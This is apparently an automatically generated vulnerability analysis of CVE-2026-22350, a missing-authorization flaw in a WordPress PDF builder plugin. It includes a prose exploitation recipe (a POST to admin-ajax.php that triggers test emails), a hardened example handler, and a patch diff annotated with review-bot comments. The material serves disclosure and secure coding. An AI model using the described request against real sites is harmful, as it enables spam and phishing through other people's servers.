Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-22350: PDF for Elementor Forms + Drag And Drop Template Builder <= 6.3.1 – Missing Authorization (pdf-for-elementor-forms)

Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 6.3.1
Patched Version: 6.5.0
Disclosed: February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22350:
The PDF for Elementor Forms + Drag And Drop Template Builder plugin for WordPress, versions up to and including 6.3.1, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions, specifically sending test emails via a vulnerable AJAX handler.

Root Cause:
The vulnerability originates in the `yeepdf_builder_send_email_testing` method of the `Yeepdf_Ajax` class in `/pdf-for-elementor-forms/backend/ajax.php`. The constructor registers it with `add_action( 'wp_ajax_yeepdf_builder_send_email_testing', ... )` (line 4 in the diff), which exposes it to every logged-in user through `admin-ajax.php`. The method reads the POST parameters `id` and `email` (lines 67-68 in the original code) and calls `wp_mail` without any capability check and without `check_ajax_referer`, so any authenticated user can trigger it.

Exploitation:
An attacker with a valid WordPress authentication cookie (Subscriber role or higher) can send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `yeepdf_builder_send_email_testing`. The request must include the parameters `id` (a post ID) and `email` (the target email address). The plugin will then use `wp_mail` to send a test email from the WordPress site, potentially enabling spam or phishing campaigns.

Patch Analysis:
The patch removes the vulnerable AJAX handler entirely. In the patched version, line 4 of `ajax.php` shows the removal of the `add_action` call for `wp_ajax_yeepdf_builder_send_email_testing`, and the `yeepdf_builder_send_email_testing` function itself (lines 67-78 in the original) is deleted. Eliminating the endpoint is the primary fix. The patch also adds nonce verification (`check_ajax_referer`) to the other AJAX handlers in the same file, unslashes request values with `wp_unslash` before sanitizing them, and corrects the swapped argument order of the existing `check_ajax_referer` call in `yeepdf_builder_text`, hardening the plugin against similar issues.
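For contrast with the removed handler, the following is an added example (not the plugin's code and not what the 6.5.0 patch does, which simply deletes the endpoint) of how a WordPress AJAX handler that sends a test email would be guarded: nonce check, capability check, object-level authorization, input validation, and a simple per-user send cap. The nonce action `_yeepdf_check_nonce`, the field `_nonce`, and the `yeepdf` post type are taken from the diff; the hook name `example_send_test_email`, the `manage_options` capability, the text domain, and the rate-limit policy are assumptions.

```php
<?php
// Added example, not the plugin's code. Hook name, capability choice, text domain
// and the rate-limit policy are hypothetical; the nonce action/field and the
// 'yeepdf' post type come from the patch.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Only the authenticated hook is registered: no wp_ajax_nopriv_ variant, so
// anonymous visitors never reach the handler at all.
add_action( 'wp_ajax_example_send_test_email', 'example_send_test_email' );

function example_send_test_email() {
    // 1. CSRF protection. A nonce proves the request came from a page this user
    //    loaded; check_ajax_referer() terminates the request with -1 on failure.
    check_ajax_referer( '_yeepdf_check_nonce', '_nonce' );

    // 2. Authorization. A nonce is not an authorization check: a Subscriber can
    //    obtain one from any admin page they can view. Require a real capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input validation. IDs are integers; addresses must parse as e-mail.
    $post_id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    $email   = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';

    if ( 0 === $post_id || 'yeepdf' !== get_post_type( $post_id ) ) {
        wp_send_json_error( array( 'message' => 'invalid template id' ), 400 );
    }
    if ( ! is_email( $email ) ) {
        wp_send_json_error( array( 'message' => 'invalid e-mail address' ), 400 );
    }

    // 4. Object-level authorization: the caller must be allowed to edit this
    //    particular template, not just templates in general.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'not permitted for this template' ), 403 );
    }

    // 5. Abuse limiting (hypothetical policy): at most five test sends per user
    //    per hour, tracked in a transient keyed by user ID.
    $key   = 'example_test_mail_' . get_current_user_id();
    $count = (int) get_transient( $key );
    if ( $count >= 5 ) {
        wp_send_json_error( array( 'message' => 'rate limit reached' ), 429 );
    }
    set_transient( $key, $count + 1, HOUR_IN_SECONDS );

    // 6. Fixed subject and a body built server-side, so request data is never
    //    echoed into the message (the removed handler used the raw id as body).
    $sent = wp_mail(
        $email,
        esc_html__( 'Template test e-mail', 'pdf-for-elementor-forms' ),
        sprintf( 'Test message for template #%d', $post_id )
    );

    if ( $sent ) {
        wp_send_json_success( array( 'message' => 'sent' ) );
    }
    wp_send_json_error( array( 'message' => 'wp_mail failed' ), 500 );
}
```

The ordering matters: the nonce check rejects cross-site requests before any work is done, the capability checks reject low-privileged accounts that hold a valid nonce (the CVE-2026-22350 case), and validation runs only on requests that have already passed both. `wp_send_json_error()` calls `wp_die()` internally, so each failure branch ends the request without a `return`.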

Impact:
Successful exploitation allows low-privileged authenticated users to abuse the site’s mail functionality. Attackers can send arbitrary test emails, which could be used for spam, phishing attempts, or harassment. This action could also lead to email server blacklisting if abused at scale. The vulnerability does not directly allow privilege escalation or remote code execution, but it constitutes an unauthorized action violating the integrity of the plugin’s administrative functions.

Differential between vulnerable and patched code

Code Diff
--- a/pdf-for-elementor-forms/backend/ajax.php
+++ b/pdf-for-elementor-forms/backend/ajax.php
@@ -3,7 +3,6 @@
 class Yeepdf_Ajax {
 	function __construct(){
 		add_action( 'wp_ajax_yeepdf_builder_text', array($this,'yeepdf_builder_text') );
-		add_action( 'wp_ajax_yeepdf_builder_send_email_testing', array($this,'yeepdf_builder_send_email_testing') );
 		add_action( 'wp_ajax_yeepdf_builder_export_html', array($this,'yeepdf_builder_export_html') );
 		add_action( 'wp_ajax_pdf_reset_template', array($this,'pdf_reset_template') );
 		add_action( 'wp_ajax_yeepdf_import_template', array($this,'yeepdf_import_template') );
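Review bot: Unregistering the `wp_ajax_yeepdf_builder_send_email_testing` hook is the right fix for that handler, but the remaining `wp_ajax_*` registrations in this constructor (`yeepdf_builder_export_html`, `pdf_reset_template`, `yeepdf_import_template`) still run for any logged-in user, and the nonce checks added further down in this patch are not a substitute for a capability check. Add a `current_user_can()` guard in each handler and document which role each endpoint is intended for.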
@@ -11,7 +10,8 @@
 		add_action('add_meta_boxes', array($this,'remove_wp_seo_meta_box'), 100);
 	}
 	function yeepdf_import_template(){
-		$url = sanitize_text_field($_POST['url']);
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
+		$url = sanitize_text_field(wp_unslash($_POST['url']));
 		$upload_dir = wp_upload_dir();
 		$path = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $url);
 		$json_content = file_get_contents($path);
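Review bot: `check_ajax_referer` here protects against CSRF but not against a low-privileged user calling the endpoint directly; add a capability check before reading `$_POST['url']`. Also, `$path` is derived by rewriting the uploads base URL into the base directory and handed straight to `file_get_contents`, so confirm that `realpath( $path )` still begins with `$upload_dir['basedir']` before reading, and reject anything else.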
@@ -20,16 +20,18 @@
 		die();
 	}
 	function pdf_reset_template(){
+
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( isset($_POST["id"])){
-			$post_id = sanitize_text_field($_POST['id']);
+			$post_id = sanitize_text_field(wp_unslash($_POST['id']));
 			update_post_meta( $post_id, 'data_email', '' );
 		}
 		die();
 	}
 	function pdf_reset_template_php(){
 		if( isset($_GET["pdf_reset"])){
-			if(wp_verify_nonce($_GET['_wpnonce'], 'pdf_reset')){
-				$post_id = sanitize_text_field($_GET['post']);
+			if(wp_verify_nonce(sanitize_text_field(wp_unslash($_GET['_wpnonce'])), 'pdf_reset')){
+				$post_id = sanitize_text_field(wp_unslash($_GET['post']));
 				update_post_meta( $post_id, 'data_email', '' );
 			}
 		}
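Review bot: The new blank line after `function pdf_reset_template(){` is a stray whitespace change; drop it. More substantively, both `pdf_reset_template` and `pdf_reset_template_php` call `update_post_meta` on a caller-supplied post ID with only a nonce check: use `absint()` rather than `sanitize_text_field()` for the ID and add `current_user_can( 'edit_post', $post_id )` so a user can only reset templates they are allowed to edit. `wp_unslash( $_GET['_wpnonce'] )` also needs an `isset()` guard; `wp_verify_nonce` already returns false for a missing value, so the guard only avoids a PHP notice.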
@@ -38,8 +40,9 @@
 		remove_meta_box('wpseo_meta', "yeepdf", 'normal');
 	}
 	function yeepdf_builder_export_html(){
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( isset($_POST["id"])){
-			$post_id = sanitize_text_field($_POST['id']);
+			$post_id = sanitize_text_field(wp_unslash($_POST['id']));
 			$id = get_post_meta( $post_id,'data_email_email',true);
 			include YEEPDF_CREATOR_BUILDER_PATH."pdf-templates/header.php";
 			echo do_shortcode($id);
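Review bot: Same pattern as the handlers above: `check_ajax_referer` is added but nothing limits who may export a template's HTML. Use `absint()` for `$post_id` and add `current_user_can( 'edit_post', $post_id )` right after it. Note also that the `data_email_email` meta is echoed through `do_shortcode()` with no escaping, which is acceptable only if that meta is written exclusively by trusted editors; a comment stating that assumption would help.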
@@ -48,7 +51,7 @@
 		die();
 	}
 	function yeepdf_builder_text(){
-		check_ajax_referer( '_nonce', '_yeepdf_check_nonce' );
+		check_ajax_referer('_yeepdf_check_nonce', '_nonce');
 		if( class_exists("Yeepdf_Addons_Woocommerce_Shortcodes")){
 			$shortcode = new Yeepdf_Addons_Woocommerce_Shortcodes;
 			$order_id = sanitize_text_field($_POST["order_id"]);
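Review bot: The old call `check_ajax_referer( '_nonce', '_yeepdf_check_nonce' )` had the action and query-arg parameters swapped, so the nonce was read from the wrong field and verified against the wrong action; the corrected order matches the other handlers. While in this function, `$_POST["order_id"]` on the last context line is still read without `isset()` or `wp_unslash()`, unlike the handlers touched elsewhere in this patch.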
@@ -66,16 +69,5 @@
 		echo $string_with_shortcodes; // phpcs:ignore WordPress.Security.EscapeOutput
 		die();
 	}
-	function yeepdf_builder_send_email_testing(){
-		$post_id = sanitize_text_field($_POST["id"]);
-		$email =  sanitize_email($_POST["email"]);
-		$data = wp_mail( $email, esc_html__( "WP Buider Email Testing", "pdf-for-wpforms" ), $post_id );
-		if($data) {
-			esc_html_e("Sent email","pdf-for-wpforms");
-		}else{
-			esc_html_e("Can't send email","pdf-for-wpforms");
-		}
-		die();
-	}
 }
 new Yeepdf_Ajax;
 No newline at end of file
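Review bot: Removing `yeepdf_builder_send_email_testing` outright is cleaner than patching it, since it had no nonce, no capability check, and passed the sanitized `id` value straight through as the mail body. Two follow-ups: any builder JavaScript that still posts `action=yeepdf_builder_send_email_testing` will now get admin-ajax's `0` response for an unknown action, so the client-side call should go in the same change; and the file still lacks a trailing newline, as the diff marker shows.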
--- a/pdf-for-elementor-forms/backend/dropbox_api.php
+++ b/pdf-for-elementor-forms/backend/dropbox_api.php
@@ -1,106 +1,125 @@
 <?php
 if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
 class Yeepdf_Dropbox_API {
-    public static function get_token($clientId,$clientSecret,$authorizationCode){
-        $url = "https://api.dropbox.com/oauth2/token";
-        //$authorizationCode = "BJ8qO0zpOjAAAAAAAAAyYfC1TjEznVFRrWsE3DSARjI";
-        $data = [
-            "code" => $authorizationCode,
-            "grant_type" => "authorization_code",
-            "client_id" => $clientId,
-            "client_secret" => $clientSecret
-        ];
-        $ch = curl_init($url);
-        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-        curl_setopt($ch, CURLOPT_POST, true);
-        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
-        $response = curl_exec($ch);
-        curl_close($ch);
-        $response = json_decode($response, true);
-        if (isset($response["access_token"])) {
-            update_option( "_yeepdf_dropbox_api_token", $response);
-            update_option( "_yeepdf_dropbox_api_token_refresh_token", $response["refresh_token"]);
-            return "ok";
-        }else{
-            if(isset($response["error_description"])){
-                return $response["error_description"];
-            }else{
-                return "error";
+    public static function get_token( $clientId, $clientSecret, $authorizationCode ) {
+        $response = wp_remote_post(
+            'https://api.dropbox.com/oauth2/token',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Content-Type' => 'application/x-www-form-urlencoded',
+                ),
+                'body'    => array(
+                    'code'          => $authorizationCode,
+                    'grant_type'    => 'authorization_code',
+                    'client_id'     => $clientId,
+                    'client_secret' => $clientSecret,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
+            return $response->get_error_message();
+        }
+        $body = wp_remote_retrieve_body( $response );
+        $data = json_decode( $body, true );
+        if ( isset( $data['access_token'] ) ) {
+            update_option( '_yeepdf_dropbox_api_token', $data );
+            if ( isset( $data['refresh_token'] ) ) {
+                update_option( '_yeepdf_dropbox_api_token_refresh_token', $data['refresh_token'] );
             }
+            return 'ok';
         }
+        return isset( $data['error_description'] ) ? $data['error_description'] : 'error';
     }
-    public static function uppload_files($fileTmpPath) {
-        $data_dropbox = get_option("_yeepdf_dropbox_api_token");
-        $refresh_token = get_option("_yeepdf_dropbox_api_token_refresh_token");
-        if(isset($data_dropbox["access_token"])) {
-            $clientId = get_option("pdf_creator_dropbox_token");
-            $clientSecret = get_option("pdf_creator_dropbox_token_secret");
-            $accessToken = $data_dropbox["access_token"];
-            $accessToken_ok = self::checkAccessToken($accessToken,$refresh_token,$clientId,$clientSecret);
-            $filename = basename($fileTmpPath);
-            $dropboxPath = '/' . $filename;
-            $file = fopen($fileTmpPath, 'rb');
-            $fileSize = filesize($fileTmpPath);
-            $ch = curl_init('https://content.dropboxapi.com/2/files/upload');
-            curl_setopt($ch, CURLOPT_HTTPHEADER, [
-                'Authorization: Bearer ' . $accessToken_ok,
-                'Content-Type: application/octet-stream',
-                'Dropbox-API-Arg: ' . json_encode([
-                    "path" => $dropboxPath,
-                    "mode" => "add",
-                    "autorename" => true,
-                    "mute" => false
-                ])
-            ]);
-            curl_setopt($ch, CURLOPT_POST, true);
-            curl_setopt($ch, CURLOPT_POSTFIELDS, fread($file, $fileSize));
-            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-            $response = curl_exec($ch);
-            curl_close($ch);
-            fclose($file);
+    public static function uppload_files( $fileTmpPath ) {
+        if ( ! file_exists( $fileTmpPath ) ) {
+            return;
+        }
+        $data_dropbox  = get_option( '_yeepdf_dropbox_api_token' );
+        $refresh_token = get_option( '_yeepdf_dropbox_api_token_refresh_token' );
+        if ( ! isset( $data_dropbox['access_token'] ) ) {
+            return;
         }
+        $clientId     = get_option( 'pdf_creator_dropbox_token' );
+        $clientSecret = get_option( 'pdf_creator_dropbox_token_secret' );
+        $accessToken  = self::checkAccessToken(
+            $data_dropbox['access_token'],
+            $refresh_token,
+            $clientId,
+            $clientSecret
+        );
+        $filename    = basename( $fileTmpPath );
+        $dropboxPath = '/' . $filename;
+        $fileSize    = filesize( $fileTmpPath );
+        $response = wp_remote_post(
+            'https://content.dropboxapi.com/2/files/upload',
+            array(
+                'timeout' => 60,
+                'headers' => array(
+                    'Authorization'    => 'Bearer ' . $accessToken,
+                    'Content-Type'     => 'application/octet-stream',
+                    'Dropbox-API-Arg'  => wp_json_encode(
+                        array(
+                            'path'       => $dropboxPath,
+                            'mode'       => 'add',
+                            'autorename' => true,
+                            'mute'       => false,
+                        )
+                    ),
+                ),
+                'body'    => file_get_contents( $fileTmpPath ),
+            )
+        );
+        return $response;
     }
-    public static function checkAccessToken($access_token,$refresh_token,$clientId,$clientSecret) {
-       $curl = curl_init();
-        curl_setopt_array($curl, array(
-          CURLOPT_URL => 'https://api.dropboxapi.com/2/users/get_current_account',
-          CURLOPT_RETURNTRANSFER => true,
-          CURLOPT_ENCODING => '',
-          CURLOPT_MAXREDIRS => 10,
-          CURLOPT_TIMEOUT => 0,
-          CURLOPT_FOLLOWLOCATION => true,
-          CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
-          CURLOPT_CUSTOMREQUEST => 'POST',
-          CURLOPT_HTTPHEADER => array(
-            'Authorization: Bearer '.$access_token
-          ),
-        ));
-        $response = curl_exec($curl);
-        $result = json_decode($response, true);
-        if(!isset($result["account_id"])) {
-            return self::getNewAccessToken($refresh_token, $clientId, $clientSecret,$access_token);
-        }else{
+    public static function checkAccessToken( $access_token, $refresh_token, $clientId, $clientSecret ) {
+        $response = wp_remote_post(
+            'https://api.dropboxapi.com/2/users/get_current_account',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Authorization' => 'Bearer ' . $access_token,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
             return $access_token;
         }
+        $body   = wp_remote_retrieve_body( $response );
+        $result = json_decode( $body, true );
+        if ( ! isset( $result['account_id'] ) ) {
+            return self::getNewAccessToken(
+                $refresh_token,
+                $clientId,
+                $clientSecret,
+                $access_token
+            );
+        }
+        return $access_token;
     }
-    public static function getNewAccessToken($refresh_token, $clientId, $clientSecret,$access_token) {
-        $url = "https://api.dropbox.com/oauth2/token";
-        $data = [
-            "refresh_token" => $refresh_token,
-            "grant_type" => "refresh_token",
-            "client_id" => $clientId,
-            "client_secret" => $clientSecret
-        ];
-        $ch = curl_init($url);
-        curl_setopt($ch, CURLOPT_POST, true);
-        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
-        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/x-www-form-urlencoded"]);
-        $response = curl_exec($ch);
-        curl_close($ch);
-        $result = json_decode($response, true);
-        if (isset($result['access_token'])) {
-            update_option( "_yeepdf_dropbox_api_token", $result);
+    public static function getNewAccessToken( $refresh_token, $clientId, $clientSecret, $access_token ) {
+        $response = wp_remote_post(
+            'https://api.dropbox.com/oauth2/token',
+            array(
+                'timeout' => 20,
+                'headers' => array(
+                    'Content-Type' => 'application/x-www-form-urlencoded',
+                ),
+                'body'    => array(
+                    'refresh_token' => $refresh_token,
+                    'grant_type'    => 'refresh_token',
+                    'client_id'     => $clientId,
+                    'client_secret' => $clientSecret,
+                ),
+            )
+        );
+        if ( is_wp_error( $response ) ) {
+            return $access_token;
+        }
+        $body   = wp_remote_retrieve_body( $response );
+        $result = json_decode( $body, true );
+        if ( isset( $result['access_token'] ) ) {
+            update_option( '_yeepdf_dropbox_api_token', $result );
             return $result['access_token'];
         }
         return $access_token;
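Review bot: Moving from raw cURL to `wp_remote_post` is a good change (it honours WordPress proxy and SSL settings and drops the commented-out hard-coded authorization code). Two concerns remain. In `checkAccessToken` and `getNewAccessToken`, a `WP_Error` from a network failure silently returns the existing token, so `uppload_files` cannot distinguish an outage from a valid token; return the `WP_Error` up to the caller and bail there. In `uppload_files`, `file_get_contents( $fileTmpPath )` loads the whole file into memory and the computed `$fileSize` is never used; for large PDFs add a size cap or a streamed upload. Finally, consider storing `_yeepdf_dropbox_api_token` (the full token response) with autoload disabled via the third argument of `update_option`, since it is only read during uploads.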
--- a/pdf-for-elementor-forms/backend/forms/checkbox.php
+++ b/pdf-for-elementor-forms/backend/forms/checkbox.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_checkbox">
                 <i class="dashicons dashicons-yes-alt"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Checkbox","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Checkbox",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
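Review bot: The text domain is changed from `pdf-for-wpforms` to `pdf-for-woocommerce`, but this plugin's slug, and therefore the domain WordPress.org language packs are generated for, is `pdf-for-elementor-forms`; strings under any other domain will not be translated. Use the plugin slug consistently, and keep one quoting style for the domain argument (this hunk mixes `"Checkbox"` with `'pdf-for-woocommerce'`).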
--- a/pdf-for-elementor-forms/backend/forms/index.php
+++ b/pdf-for-elementor-forms/backend/forms/index.php
@@ -11,7 +11,7 @@
         ?>
         <div class="builder__widget--inner">
             <div class="builder__widget_tab builder__widget_genaral">
-                <div class="builder__widget_tab_title"><span class="builder__widget_tab_title_t"><?php esc_attr_e( "Forms", "yeepdf") ?></span><span
+                <div class="builder__widget_tab_title"><span class="builder__widget_tab_title_t"><?php esc_attr_e( "Forms", "pdf-for-woocommerce") ?></span><span
                         class="builder__widget_tab_title_icon dashicons dashicons-arrow-down-alt2"></span><span
                         class="builder__widget_tab_title_icon dashicons dashicons-arrow-up-alt2"></span>
                 </div>
@@ -27,7 +27,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_text">
                 <i class="dashicons dashicons-editor-textcolor"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Text Input","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Text Input",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
@@ -59,17 +59,17 @@
         ?>
         <div class="builder__editor--item builder__editor--item-form_label">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Label","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Label",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Before text","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Before text",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_before_label"  type="text" >
                             </div>
                         </div>
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("After text","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("After text",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_after_label"  type="text" >
                             </div>
@@ -80,11 +80,11 @@
         </div>
         <div class="builder__editor--item builder__editor--item-form_default_val">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Default Value","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Default Value",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <input name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_default"  type="text" >
                             </div>
@@ -95,11 +95,11 @@
         </div>
         <div class="builder__editor--item builder__editor--item-form_default_select">
             <div class="builder__editor--html">
-                <label><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                <label><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                 <div class="yeepdf_setting_group">
                     <div class="yeepdf_setting_row">
                         <div class="yeepdf_settings_group-wrapper">
-                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value","pdf-for-wpforms") ?></label>
+                            <label class="yeepdf_checkbox_label"><?php esc_html_e("Value",'pdf-for-woocommerce') ?></label>
                             <div class="setting_input-wrapper">
                                 <textarea name="yeepdf_name[]" class="yeepdf_setting_input yeepdf_setting_form_default_value" ></textarea>
                             </div>
--- a/pdf-for-elementor-forms/backend/forms/radio.php
+++ b/pdf-for-elementor-forms/backend/forms/radio.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_radio">
                 <i class="dashicons dashicons-marker"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Radio","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Radio",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
--- a/pdf-for-elementor-forms/backend/forms/select.php
+++ b/pdf-for-elementor-forms/backend/forms/select.php
@@ -10,13 +10,13 @@
         <li>
             <div class="momongaDraggable" data-type="form_select">
                 <i class="dashicons dashicons-list-view"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Select","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Select",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
     }
     function add_input_text_settings($type){
-        $rand_name = rand(10000,9999999);
+        $rand_name = wp_rand(10000,9999999);
         $type["block"]["form_select"]["builder"] = '
         <div class="builder-elements">
             <div class="builder-elements-content" data-type="form_select">
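Review bot: `wp_rand()` in place of `rand()` for `$rand_name` satisfies the coding-standards sniff and is backed by `random_int()`, but this value only disambiguates an HTML `name` attribute, so no security property depends on it; a one-line comment saying so would spare the next reader from looking for one. The text-domain change has the same slug mismatch noted for checkbox.php.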
--- a/pdf-for-elementor-forms/backend/forms/textarea.php
+++ b/pdf-for-elementor-forms/backend/forms/textarea.php
@@ -10,7 +10,7 @@
         <li>
             <div class="momongaDraggable" data-type="form_textarea">
                 <i class="dashicons dashicons-button"></i>
-                <div class="yeepdf-tool-text"><?php esc_html_e("Textarea","pdf-for-wpforms") ?></div>
+                <div class="yeepdf-tool-text"><?php esc_html_e("Textarea",'pdf-for-woocommerce') ?></div>
             </div>
         </li>
         <?php
--- a/pdf-for-elementor-forms/backend/index.php
+++ b/pdf-for-elementor-forms/backend/index.php
@@ -86,22 +86,22 @@
         }
 ?>
         <div class="builder__editor--item builder__editor--item-settings">
-            <label><?php esc_html_e("Settings", "pdf-for-wpforms") ?></label>
+            <label><?php esc_html_e("Settings", 'pdf-for-woocommerce') ?></label>
             <div class="yeepdf_setting_group">
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("DPI", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("DPI", 'pdf-for-woocommerce') ?></label>
                         <input name="builder_pdf_settings[dpi]" type="text" class="yeepdf_setting_input" value="<?php echo esc_attr($pdfs["dpi"]) ?>">
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Orientation", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Orientation", 'pdf-for-woocommerce') ?></label>
                         <select name="builder_pdf_settings[orientation]" class="yeepdf_setting_input">
-                            <option value="P"><?php esc_html_e("Portrait", "pdf-for-wpforms") ?></option>
-                            <option <?php selected($pdfs["orientation"], "L") ?> value="L"><?php esc_html_e("Landscape", "pdf-for-wpforms") ?></option>
+                            <option value="P"><?php esc_html_e("Portrait", 'pdf-for-woocommerce') ?></option>
+                            <option <?php selected($pdfs["orientation"], "L") ?> value="L"><?php esc_html_e("Landscape", 'pdf-for-woocommerce') ?></option>
                         </select>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Paper Size", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Paper Size", 'pdf-for-woocommerce') ?></label>
                         <select name="builder_pdf_settings[size]" class="yeepdf_setting_input">
                             <?php
                             foreach ($sizes as $group => $options) {
@@ -112,7 +112,7 @@
                                         $check = "selected";
                                     }
                             ?>
-                                    <option <?php echo esc_attr($check) ?> value="<?php echo esc_attr($key) ?>"><?php echo esc_attr($value) ?></option>
+                                    <option <?php echo esc_attr($check) ?> value="<?php echo esc_attr($key) ?>"><?php echo esc_html($value) ?></option>
                             <?php
                                 }
                                 echo wp_kses_post('</optgroup>');
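Review bot: Switching the option label from `esc_attr()` to `esc_html()` is the correct escaping context for element content. The `echo wp_kses_post('</optgroup>')` on the last context line is a roundabout way to emit a static closing tag; a literal `</optgroup>` outside the PHP block, or `echo '</optgroup>';`, reads better and does the same thing.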
@@ -123,7 +123,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font family", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font family", 'pdf-for-woocommerce') ?></label>
                         <select class="font_family yeepdf_setting_input" name="builder_pdf_settings_font_family">
                             <?php
                             foreach ($list_fonts as $font => $vl) {
@@ -141,22 +141,22 @@
                         </select>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font size", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Font size", 'pdf-for-woocommerce') ?></label>
                         <input type="number" class="font-size-main">
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <?php Yeepdf_Editor::get_color_pick(esc_html__("Font color", "pdf-for-wpforms")) ?>
+                        <?php Yeepdf_Editor::get_color_pick(esc_html__("Font color", 'pdf-for-woocommerce')) ?>
                     </div>
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Header Template", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Header Template", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_header_settings", $pdfs, $list_tempates);
                         ?>
                     </div>
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Footer Template", "pdf-for-wpforms") ?></label>
+                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Footer Template", 'pdf-for-woocommerce') ?></label>
                         <?php
                         do_action("yeepdf_footer_settings", $pdfs, $list_tempates);
                         ?>
@@ -164,7 +164,7 @@
                 </div>
                 <div class="yeepdf_setting_row">
                     <div class="yeepdf_settings_group-wrapper">
-                        <label class="yeepdf_checkbox_label"><?php esc_html_e("Watermark text", "pdf-for-wpforms") ?></label>
